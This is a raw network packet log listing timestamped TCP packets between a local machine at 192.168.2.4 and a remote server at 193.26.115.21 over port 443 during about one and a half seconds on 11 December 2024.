Dec 11, 2024 18:03:15.190850973 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.190902948 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.190969944 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.190969944 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.190978050 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.191063881 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.202831984 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.202876091 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.202950954 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.202950954 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.202959061 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.203022003 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.212688923 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.212742090 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.212776899 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.212785959 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.212810993 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.212832928 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.256620884 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.256649017 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.256684065 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.256691933 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.256722927 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.256741047 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.340853930 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.340878963 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.340923071 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.340936899 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.340967894 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.340979099 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.347820044 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.347841024 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.347879887 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.347887993 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.347913980 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.347924948 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.355808973 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.355829000 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.355882883 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.355890989 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.355930090 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.362163067 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.362181902 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.362217903 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.362226009 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.362242937 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.362267971 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.369380951 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.369401932 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.369436979 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.369443893 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.369456053 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.369482040 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.376718998 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.376738071 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.376781940 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.376789093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.376812935 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.376832008 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.383805037 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.383824110 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.383840084 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.383876085 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.383881092 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.383918047 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.448007107 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.448036909 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.448112965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.448121071 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.448143959 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.448162079 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.531579971 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.531613111 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.531671047 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.531689882 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.531719923 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.531737089 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.537736893 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.537760019 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.537802935 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.537810087 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.537839890 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.537847996 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.544059992 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.544085026 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.544118881 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.544126034 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.544156075 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.544167995 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.549518108 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.549539089 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.549581051 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.549587965 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.549623966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.549634933 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.556248903 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.556271076 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.556314945 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.556319952 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.556355953 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.556369066 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.561733007 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.561759949 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.561801910 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.561810017 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.561839104 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.561851978 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.567971945 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.567994118 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.568031073 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.568037033 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.568070889 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.568079948 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.579366922 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.639692068 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.639718056 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.639774084 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.639791965 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.639817953 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.639859915 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.723397017 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.723424911 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.723504066 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.723516941 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.723546028 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.723560095 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.729631901 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.729651928 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.729691029 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.729697943 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.729732990 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.735816002 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.735836983 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.735872984 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.735879898 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.735929966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.735929966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.742312908 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.742343903 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.742507935 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.742516041 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.742578030 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.747687101 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.747716904 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.747746944 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.747754097 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.747797966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.754779100 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.754801035 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.754842043 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.754848957 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.754887104 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.759748936 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.759769917 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.759815931 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.759821892 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.759850979 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.759865046 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.831840992 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.831861973 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.831938028 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.831947088 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.831979036 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.831990957 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.918241978 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.918271065 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.918311119 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.918322086 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.918364048 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.918389082 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.923971891 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.923993111 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.924052954 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.924062014 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.924093008 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.924110889 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.930612087 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.930635929 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.930670023 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.930679083 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.930708885 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.930730104 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.936824083 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.936845064 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.936925888 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.936925888 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.936934948 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.937052965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.942643881 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.942665100 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.942703962 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.942712069 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.942744970 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.942763090 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.948417902 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.948441029 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.948476076 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.948483944 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.948517084 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.948529005 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.954133987 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.954154968 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.954220057 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:15.954229116 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:15.954263926 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.023905993 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.023941994 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.023974895 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.023982048 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.024008036 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.024028063 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.111785889 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.111814022 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.111875057 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.111886978 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.111911058 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.111927032 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.117264032 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.117285967 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.117321014 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.117327929 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.117352962 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.117367983 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.122277021 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.122299910 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.122337103 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.122344971 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.122365952 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.122390032 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.128017902 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.128047943 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.128073931 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.128079891 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.128106117 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.128122091 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.133203030 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.133224964 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.133259058 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.133265972 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.133299112 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.133316040 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.139139891 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.139168024 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.139194965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.139200926 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.139221907 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.139240980 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.146337032 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.146356106 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.146389961 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.146404028 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.146413088 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.146466970 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.217200994 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.217264891 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.217359066 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.217359066 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.217369080 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.218708992 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.323487997 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.323544979 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.323586941 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.323606014 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.323725939 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.323764086 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.329330921 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.329389095 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.329421043 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.329433918 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.329535961 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.329699993 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.335280895 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.335370064 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.335412025 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.335427999 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.335437059 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.335488081 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.340445042 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.340496063 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.340564966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.340570927 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.340600014 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.343472958 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.346833944 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.346887112 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.346977949 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.346977949 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.346985102 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.347693920 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.352519035 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.352572918 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.352612972 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.352618933 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.352792025 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.352792025 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.357800961 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.357848883 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.357892036 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.357907057 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.358243942 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.358252048 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.368328094 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.411587000 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.411648989 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.411751032 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.411751032 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.411760092 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.412136078 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.519233942 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.519292116 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.519335985 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.519370079 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.519449949 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.519500971 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.525079012 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.525131941 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.525173903 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.525193930 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.525240898 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.525500059 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.530328989 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.530380011 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.530479908 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.530479908 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.530493021 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.531363010 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.536500931 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.536545992 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.536591053 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.536612034 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.536669970 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.536750078 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.542151928 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.542201996 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.542257071 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.542284012 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.542346001 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.542665958 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.547700882 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.547744036 CET	443	49735	193.26.115.21	192.168.2.4
